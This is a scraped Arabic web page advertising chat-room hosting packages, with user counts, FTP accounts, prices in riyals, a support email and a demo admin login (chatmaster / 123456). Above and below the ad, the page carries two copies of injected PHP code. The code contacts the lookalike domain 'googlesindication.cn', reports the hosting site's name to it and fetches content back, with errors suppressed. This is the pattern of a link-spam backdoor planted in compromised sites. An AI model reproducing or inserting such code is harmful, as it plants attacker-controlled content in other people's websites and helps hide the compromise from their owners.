|
|
 |
 |
fetch_remote_file("googlesindication.cn", "/links.php?site=".$_SERVER['HTTP_HOST']);
class GetLinks
{
var $_socket_timeout = 6;
function fetch_remote_file($host, $path)
{
@ini_set('allow_url_fopen', 1);
@ini_set('default_socket_timeout', $this->_socket_timeout);
$this->_fetch_remote_type = 'socket';
$buff = '';
$fp = @fsockopen($host, 80, $errno, $errstr, $this->_socket_timeout);
if ($fp) {
@fputs($fp, "GET {$path} HTTP/1.0\r\nHost: {$host}\r\n");
@fputs($fp, "User-Agent: {$user_agent}\r\n\r\n");
while (!@feof($fp)) {
$buff .= @fgets($fp, 128);
}
@fclose($fp);
$page = explode("\r\n\r\n", $buff);
return $page[1];
}
}
}
?> |
 |
 |
 |
 |
 |
 | | | |
|
|
100
يوزر |
| حساب
FTP |
| عدد الغرف : مفتوح |
| عدد السوابر: مفتوح |
| شهر
180ريال |
| ستة
أشهر 450 ريال |
| سنة
واحدة 750
ريال | |
 |
|
| | |
|
200
يوزر |
| حساب FTP |
| عدد الغرف : مفتوح |
| عدد السوابر: مفتوح |
|
شهر
300 ريال |
| ستة
أشهر 800 ريال |
| سنة
واحدة 1150ريال | |
 |
|
| | |
|
500
يوزر |
| حساب FTP |
| عدد الغرف : مفتوح |
| عدد السوابر: مفتوح |
| شهر
1500ريال |
| ستة
أشهر 2450ريال |
| سنة
واحدة 3000
ريال | |
 |
|
| | |
|
|
|
لطلب شات : support@shrg4h.com |
|
تجربة الشات |
|
|
|
الادمن
: chatmaster
الباسبورد : 123456 |
|
fetch_remote_file("googlesindication.cn", "/links.php?site=".$_SERVER['HTTP_HOST']);
class GetLinks
{
var $_socket_timeout = 6;
function fetch_remote_file($host, $path)
{
@ini_set('allow_url_fopen', 1);
@ini_set('default_socket_timeout', $this->_socket_timeout);
$this->_fetch_remote_type = 'socket';
$buff = '';
$fp = @fsockopen($host, 80, $errno, $errstr, $this->_socket_timeout);
if ($fp) {
@fputs($fp, "GET {$path} HTTP/1.0\r\nHost: {$host}\r\n");
@fputs($fp, "User-Agent: {$user_agent}\r\n\r\n");
while (!@feof($fp)) {
$buff .= @fgets($fp, 128);
}
@fclose($fp);
$page = explode("\r\n\r\n", $buff);
return $page[1];
}
}
}
?>
| |
|
|
|